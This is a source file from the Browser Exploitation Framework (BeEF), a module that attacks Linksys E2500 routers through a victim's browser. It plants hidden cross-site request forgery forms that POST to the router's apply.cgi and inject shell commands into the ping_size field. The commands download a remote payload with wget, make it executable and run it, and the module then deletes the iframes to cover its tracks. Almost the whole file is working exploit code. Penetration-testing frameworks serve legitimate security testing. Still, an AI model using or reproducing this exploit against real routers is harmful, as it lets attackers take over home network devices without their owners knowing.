Path: blob/master/modules/exploits/router/linksys_e2500_shell/command.js
1154 views
//1// Copyright (c) 2006-2025 Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {7var base = '<%= @base %>';8var payload = '<%= @payload %>';9var random = Math.random().toString(36).substring(7);10var timeout = 15;111213var e2500_iframe_2<%= @command_id %> = beef.dom.createIframeXsrfForm(base + "apply.cgi", "POST", "application/x-www-form-urlencoded",14[{'type':'hidden', 'name':'submit_button', 'value':'Diagnostics'} ,15{'type':'hidden', 'name':'change_action', 'value':'gozila_cgi'},16{'type':'hidden', 'name':'submit_type', 'value':'start_ping'},17{'type':'hidden', 'name':'action', 'value':''},18{'type':'hidden', 'name':'commit', 'value':'0'},19{'type':'hidden', 'name':'ping_ip', 'value':'192.168.1.1'},20{'type':'hidden', 'name':'ping_size', 'value':'&/tmp/' + random +'&'},21{'type':'hidden', 'name':'ping_times', 'value':'5'},22{'type':'hidden', 'name':'traceroute_ip', 'value':''},23]);2425var e2500_iframe_1<%= @command_id %> = beef.dom.createIframeXsrfForm(base + "apply.cgi", "POST", "application/x-www-form-urlencoded",26[{'type':'hidden', 'name':'submit_button', 'value':'Diagnostics'} ,27{'type':'hidden', 'name':'change_action', 'value':'gozila_cgi'},28{'type':'hidden', 'name':'submit_type', 'value':'start_ping'},29{'type':'hidden', 'name':'action', 'value':''},30{'type':'hidden', 'name':'commit', 'value':'0'},31{'type':'hidden', 'name':'ping_ip', 'value':'192.168.1.1'},32{'type':'hidden', 'name':'ping_size', 'value':'&/usr/bin/wget ' + payload + ' -O /tmp/' + random + ';chmod 777 /tmp/' + random + '&'},33{'type':'hidden', 'name':'ping_times', 'value':'5'},34{'type':'hidden', 'name':'traceroute_ip', 'value':''},35]);36beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");3738cleanup = function() {39document.body.removeChild(e2500_iframe_1<%= @command_id %>);40document.body.removeChild(e2500_iframe_2<%= @command_id %>);41}42setTimeout("cleanup()", timeout*1000);4344});45464748